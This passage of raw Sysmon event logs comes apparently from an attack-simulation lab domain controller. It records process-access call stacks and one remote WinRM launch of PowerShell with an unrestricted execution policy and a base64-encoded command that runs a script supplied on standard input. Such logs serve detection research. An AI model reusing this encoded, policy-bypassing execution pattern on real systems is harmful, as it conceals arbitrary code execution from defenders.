AZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-425F-6000-DB02-000000009901}3336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-425F-6000-DB02-000000009901}3336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-425F-6000-D902-000000009901}38604212C:\Windows\system32\WinrsHost.exe{08A6967A-425F-6000-DB02-000000009901}3336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.282{08A6967A-425F-6000-DB02-000000009901}3336C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-425F-6000-BA54-110000000000}0x1154ba0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.277{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.184{08A6967A-40E0-6000-1400-000000009901}13004092C:\Windows\system32\svchost.exe{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.168{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-425F-6000-DA02-000000009901}14602896C:\Windows\system32\conhost.exe{08A6967A-425F-6000-D902-000000009901}3860C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:47.153{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-425F-6000-DA02-000000009901}1460C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 